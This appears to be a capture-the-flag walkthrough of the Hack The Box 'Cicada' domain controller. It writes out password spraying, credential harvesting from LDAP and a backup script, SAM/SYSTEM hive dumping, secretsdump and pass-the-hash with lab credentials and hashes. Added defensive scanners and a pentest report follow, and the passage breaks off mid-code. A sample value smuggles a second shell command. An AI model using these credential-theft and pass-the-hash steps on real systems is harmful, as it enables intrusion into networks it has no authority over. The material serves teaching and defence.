Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
Password
Cicada$M6Corpb*@Lp#nZp!8

Getting Password for michael.wrightson

We sprayed the newly found password together with the previously extracted list of usernames against the box and got a hit: the credentials were valid for michael.wrightson.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'               
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Username            Password
michael.wrightson   Cicada$M6Corpb*@Lp#nZp!8

Getting the Password for david.orelious

As the next step we used these credentials to read the LDAP user descriptions and found another password, this time for the user david.orelious.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec ldap 10.129.180.249 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.180.249  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GET-DESC... 10.129.180.249  389    CICADA-DC        [+] Found following users: 
GET-DESC... 10.129.180.249  389    CICADA-DC        User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.129.180.249  389    CICADA-DC        User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.180.249  389    CICADA-DC        User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.129.180.249  389    CICADA-DC        User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
Username         Password
david.orelious   aRt$Lp#7t*VQ!3
┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3

Investigating DEV Share

The newly found credentials of david.orelious allowed us to read the contents of the DEV share.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV             READ            
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL          READ            Logon server share

For convenience we downloaded all of its contents using NetExec's spider_plus module.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ netexec smb 10.129.180.249 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.129.180.249  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.249  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.180.249  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.249  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.249  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.249  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.249  445    CICADA-DC        C$                              Default share
SMB         10.129.180.249  445    CICADA-DC        DEV             READ            
SMB         10.129.180.249  445    CICADA-DC        HR              READ            
SMB         10.129.180.249  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.249  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.180.249  445    CICADA-DC        SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.180.249.json".
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Readable Shares:  5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Total files found:    12
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size average:    1.09 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File size max:        5.22 KB
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] File unique exts:     6 (.ps1, .txt, .pol, .ini, .cmtx, .inf)
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [*] Downloads successful: 12
SPIDER_PLUS 10.129.180.249  445    CICADA-DC        [+] All files processed successfully.

Getting Password for emily.oscars

The DEV share contained only one file, Backup_script.ps1. A quick look at it revealed another set of credentials, this time for emily.oscars.

┌──(kali㉿kali)-[/media/…/HTB/Machines/Cicada/files]
└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Username       Password
emily.oscars   Q!3@Lp#M6b*7t*Vt

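Finding this class of problem before an attacker does comes down to scanning what is reachable on the shares. The following scanner is an added example written for this article, not the box's own Backup_script.ps1 and not part of the original writeup: it walks a mirrored share (for instance the folder spider_plus downloads into) and flags lines that look like hard-coded credentials. The pattern list, the sample script text and the credential values inside it are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Heuristic patterns for secrets that typically end up in scripts and config
# files on shares. Constructed for this example; extend to taste.
SECRET_PATTERNS = [
    # $password = ConvertTo-SecureString "..." -AsPlainText -Force
    ("powershell-plaintext-securestring",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.IGNORECASE)),
    # $password = "..."   /   $pwd = '...'
    ("powershell-password-variable",
     re.compile(r'''\$(?:pass(?:word)?|pwd)\s*=\s*["']([^"']+)["']''', re.IGNORECASE)),
    # net use \\host\share <password> /user:DOMAIN\name
    ("net-use-inline-password",
     re.compile(r'net\s+use\s+\S+\s+(\S+)\s+/user:', re.IGNORECASE)),
    # ini/properties style: password=...  or  passwd: ...
    ("password-in-config",
     re.compile(r'(?:password|passwd)\s*[=:]\s*(\S{4,})\s*$', re.IGNORECASE)),
]


def mask_secret(secret):
    """Keep only the first two characters so a report does not re-leak the value."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_text(text, source):
    """Return one finding per line that matches a secret pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({
                    "source": source,
                    "line": lineno,
                    "rule": rule,
                    "secret_length": len(m.group(1)),
                    "preview": mask_secret(m.group(1)),
                })
                break  # one finding per line is enough for triage
    return findings


def scan_directory(root, exts=(".ps1", ".bat", ".cmd", ".vbs", ".txt", ".ini", ".xml", ".config")):
    """Walk a mirrored share (e.g. the spider_plus download folder) and scan text files."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            findings.extend(scan_text(text, str(path)))
    return findings


# Constructed samples shaped like the files found on the DEV share; the
# credential values are made up for this example.
SAMPLE_BACKUP_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$username = "svc_backup"
$password = ConvertTo-SecureString "Example-Pass-123!" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\\Backup\\smb.zip"
"""

SAMPLE_CONFIG = """\
[smtp]
server=mail.example.internal
password=MailPass99
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_directory(sys.argv[1])
    else:
        results = scan_text(SAMPLE_BACKUP_SCRIPT, "Backup_script.ps1") + scan_text(SAMPLE_CONFIG, "mail.ini")
    for f in results:
        print(f"{f['source']}:{f['line']}  {f['rule']}  ({f['secret_length']} chars: {f['preview']})")
```

Run it with the download directory as the only argument; without an argument it scans the two embedded samples. The report masks the matched value on purpose: the point of the scan is to locate the script and get the credential rotated, not to copy the secret into yet another file.
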
Foothold

The user emily.oscars was allowed to log in to the box using WinRM.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i '10.129.180.249' -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

user.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
3082bc0bc9b4ac7f6c76966b10b60e4a

Enumeration

We immediately spotted SeBackupPrivilege in the token of emily.oscars and therefore knew how to proceed to elevate our privileges to SYSTEM.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
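Reading a whoami /all dump by eye works for one account; across an estate it is easier to let a script point out the dangerous memberships and privileges. The triage helper below is an added example written for this article, not a tool from the writeup: it parses the GROUP and PRIVILEGES tables and reports well-known admin-equivalent group SIDs and privileges that bypass DACLs. The sample output is a condensed, constructed copy of the table shown above; the risk descriptions are paraphrased from Microsoft's privilege documentation.

```python
import re
import sys

# Privileges that let the holder step around DACLs. A process holding one of
# these in the Disabled state can still enable it, so presence is what matters.
HIGH_RISK_PRIVILEGES = {
    "SeBackupPrivilege": "read any file or registry hive regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients",
    "SeAssignPrimaryTokenPrivilege": "start processes under another token",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Well-known group SIDs whose members are effectively host admins. Matching on
# the SID keeps this working on localized systems where group names differ.
HIGH_RISK_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}

GROUP_ROW = re.compile(
    r"^(?P<name>\S.*?)\s{2,}(?P<type>Well-known group|Alias|Group|Label|User)\s+(?P<sid>S-1-[\d-]+)")
PRIV_ROW = re.compile(r"^(?P<name>Se\w+Privilege)\s+(?P<desc>.*?)\s+(?P<state>Enabled|Disabled)\s*$")


def parse_whoami_all(output):
    """Parse the GROUP and PRIVILEGES tables of `whoami /all` text."""
    groups, privileges = {}, {}
    for raw in output.splitlines():
        line = raw.rstrip()
        m = GROUP_ROW.match(line)
        if m:
            groups[m["name"]] = m["sid"]
            continue
        m = PRIV_ROW.match(line)
        if m:
            privileges[m["name"]] = m["state"]
    return groups, privileges


def triage(output):
    """Return the high-risk groups and privileges present in the token."""
    groups, privileges = parse_whoami_all(output)
    risky_groups = sorted((name, HIGH_RISK_GROUP_SIDS[sid])
                          for name, sid in groups.items() if sid in HIGH_RISK_GROUP_SIDS)
    risky_privs = sorted((name, state, HIGH_RISK_PRIVILEGES[name])
                         for name, state in privileges.items() if name in HIGH_RISK_PRIVILEGES)
    return {"groups": risky_groups, "privileges": risky_privs}


# Constructed sample: a condensed copy of the whoami /all table above.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_WHOAMI
    result = triage(text)
    for name, role in result["groups"]:
        print(f"group     {name}  ->  {role}")
    for name, state, why in result["privileges"]:
        print(f"privilege {name} [{state}]  ->  {why}")
```

Pipe a saved whoami /all capture into it, or run it without input to see the sample. On this host the script would report Backup Operators membership together with SeBackupPrivilege and SeRestorePrivilege, which is exactly the combination the next section relies on; a Remote Management Users member holding those rights is the finding to raise with the domain owners.
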

Privilege Escalation to SYSTEM

First, we saved the SYSTEM and SAM registry hives with reg save and downloaded them to our local machine.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system "C:\Users\emily.oscars.CICADA\Documents\system.hive"
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam "C:\Users\emily.oscars.CICADA\Documents\sam.hive"
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam.hive
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam.hive to sam.hive
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system.hive
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system.hive to system.hive
                                        
Info: Download successful!

Then we used impacket-secretsdump to extract the hashes from the two hives offline.

$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
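When a SAM dump like this turns up, in an engagement report or during an incident, the first thing to settle is which accounts actually hold a usable NT hash and therefore need their passwords rotated. The parser below is an added example written for this article, not part of Impacket or of the original writeup: it reads secretsdump's uid:rid:lmhash:nthash::: lines, drops accounts whose NT hash is the well-known empty-password value, and flags the built-in Administrator (RID 500) and any account that still has a legacy LM hash stored. The sample text is the three SAM lines from the output above, with their status lines.

```python
import re
import sys

# Well-known "empty" values in secretsdump's uid:rid:lmhash:nthash::: lines.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

HASH_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$")


def parse_secretsdump(text):
    """Return one dict per hash line; [*]/[-] status lines are ignored."""
    accounts = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if not m:
            continue
        accounts.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return accounts


def triage(accounts):
    """Keep accounts whose NT hash is a real credential and annotate them."""
    usable = []
    for acct in accounts:
        if acct["nt"] == EMPTY_NT:
            continue  # empty password: nothing to rotate, though the account itself may need review
        flags = []
        if acct["rid"] == 500:
            flags.append("built-in Administrator (RID 500)")
        if acct["lm"] != EMPTY_LM:
            flags.append("legacy LM hash stored")
        usable.append({**acct, "flags": flags})
    return usable


def render(usable):
    """Human-readable rotation list; hashes are not echoed back."""
    lines = []
    for acct in usable:
        extra = f"  [{'; '.join(acct['flags'])}]" if acct["flags"] else ""
        lines.append(f"rotate: {acct['user']} (rid {acct['rid']}){extra}")
    return "\n".join(lines)


# Sample input: the SAM section of the secretsdump run shown above.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
"""

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DUMP
    print(render(triage(parse_secretsdump(text))))
```

For this box the output is a single line for Administrator. In a real environment the same hash for RID 500 across several machines is the classic LAPS gap that the report's F-003 remediation addresses, so the list is worth diffing host by host.
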

The Administrator NT hash allowed us to use Pass-the-Hash (PtH) to log in over WinRM and grab root.txt.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i '10.129.180.249' -u 'Administrator' -H 2b87e7c93a3e8a0ea4a581937016f341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a640419b92185ae9df6f3a0eda0a9372

📋 Security Assessment Report

Findings summary: 1 Critical, 4 High, 0 Medium; 13 open ports
F-001 — OS Command Injection — Remote Code Execution
Score: 9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the application passes user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality: High
Integrity: High
Availability: High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
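The remediation above names the Python form of the fix; the snippet below is an added example for this report section, not code from the assessed application, showing the vulnerable string-building pattern next to the hardened argument-vector form with allowlist validation. The ping wrapper, the host allowlist and the sample values are constructed for illustration (the -c flag is the Linux ping syntax).

```python
import re
import subprocess

# Allowlist: RFC 1123 style host names and dotted IPv4 literals. Labels cannot
# start with "-", so a validated value can never be read as an option flag.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def vulnerable_ping_command(host):
    """BAD: builds a string for the shell. A value such as "x; whoami" becomes
    two commands once /bin/sh parses it. Returned, never executed, for contrast."""
    return f"ping -c 1 {host}"


def is_safe_host(host):
    """True only for values that match the allowlist."""
    return bool(HOST_RE.match(host))


def validate_host(host):
    if not is_safe_host(host):
        raise ValueError("host must be a hostname or IPv4 address")
    return host


def safe_ping_argv(host):
    """GOOD: the validated value is one element of an argument vector, so the
    kernel receives it verbatim and no shell ever interprets it."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host, timeout=5.0):
    """Execute the hardened form; with a list argv, shell=False is the default."""
    proc = subprocess.run(safe_ping_argv(host), capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.returncode


if __name__ == "__main__":
    for candidate in ["10.129.180.249", "cicada.htb", "example.com; id", "-f"]:
        print(f"{candidate!r:22} allowlisted={is_safe_host(candidate)}")
```

Two things are doing the work here and both are needed: the argument vector removes the shell from the path entirely, and the allowlist stops a hostname-shaped value from reaching the binary as something other than a hostname. Running the web process as a dedicated low-privilege account, as the remediation also says, limits what the remaining bugs can reach.

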

F-002 — Active Directory ACL Abuse — Indirect Domain Escalation
Score: 8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that BloodHound analysis of the Active Directory environment revealed exploitable ACL attack paths connecting low-privilege user accounts to privileged domain objects. Permissions including GenericAll, WriteDACL, ForceChangePassword, and GenericWrite were identified on critical objects, forming a chain to Domain Admin access without exploiting any software vulnerability.

Impact

An attacker with initial access to any domain user account along the identified path can chain misconfigured permissions to progressively escalate privileges and reach Domain Admin. This attack requires no software CVE exploitation, making it invisible to traditional vulnerability scanners. The complete attack path was traversed during this engagement from a standard domain user account to full domain administrator access.

Confidentiality: High
Integrity: High
Availability: High

Remediation

Conduct a full BloodHound audit and remediate all shortest paths to Domain Admin and other Tier-0 assets. Remove unnecessary permissions granted to regular user accounts on privileged objects. Implement an Active Directory tiering model (Tier 0: DCs and admin accounts, Tier 1: servers, Tier 2: workstations) with strict boundaries. Enable Protected Users security group for all Tier-0 accounts. Review and tighten ACLs on all AdminSDHolder-protected objects.

F-003 — Pass-the-Hash — NTLM Hash Lateral Movement
Score: 8.1 (High)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that NTLM password hashes obtained from compromised systems were successfully used to authenticate to other network services without knowledge of the plaintext password. The NTLM authentication protocol accepts the hash directly as the authentication proof, requiring no password cracking to enable lateral movement across the environment.

Impact

An attacker can authenticate to any NTLM-accepting service — SMB, WMI, WinRM, RDP with restricted admin mode — using only harvested hashes, enabling lateral movement across the entire domain without recovering any plaintext credentials. In this engagement, pass-the-hash was used to move between multiple hosts and ultimately obtain domain administrator access, demonstrating that a single compromised host can cascade to full domain takeover.

Confidentiality: High
Integrity: High
Availability: High

Remediation

Enable Windows Credential Guard on all supported hosts to protect LSASS credential material from extraction. Add all privileged accounts to the Protected Users security group, which enforces Kerberos-only authentication and prevents NTLM hash use. Deploy Local Administrator Password Solution (LAPS) to ensure every machine has a unique local admin password, eliminating cross-host lateral movement via shared credentials. Restrict NTLM authentication via Group Policy where Kerberos is available.

F-004 — Insecure Direct Object Reference — Unauthorised Data Access
Score: 8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Description

During the penetration test, it was discovered that the application exposed direct references to internal objects — user IDs, document identifiers, and resource paths — in URL parameters and request bodies without verifying that the authenticated user has authorisation to access the referenced object. By modifying these identifiers, it was possible to access data belonging to other users.

Impact

An attacker with any authenticated account can access, modify, or delete data belonging to any other user in the application by enumerating or guessing object identifiers. In this engagement, IDOR exposure encompassed all registered user profiles, associated sensitive records, and configuration data. Where write operations were also exposed without authorisation checks, data integrity across the entire user base was at risk.

Confidentiality: High
Integrity: High
Availability: None

Remediation

Implement server-side object-level authorisation checks on every request that accesses a resource — verify that the authenticated user owns or has explicit permission to access the referenced object, regardless of how the identifier was supplied. Replace sequential integer IDs in all external-facing references with randomly generated UUIDs or cryptographically opaque tokens. Conduct a comprehensive audit of all API endpoints for missing authorisation checks using an automated tool and manual review.
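The object-level check the remediation describes is small but has to run on every access path. The store below is an added example for this report section, not code from the assessed application: it contrasts a lookup that trusts the identifier with one that verifies ownership or an explicit share grant on each call, and issues opaque identifiers instead of sequential integers. The document store, user names and document contents are constructed for illustration.

```python
import secrets
from dataclasses import dataclass, field


@dataclass
class Document:
    doc_id: str
    owner: str
    body: str
    shared_with: set = field(default_factory=set)


class DocumentStore:
    """In-memory store standing in for the application's database."""

    def __init__(self):
        self._docs = {}

    def create(self, owner, body):
        # Opaque, unguessable identifier instead of a sequential integer, so
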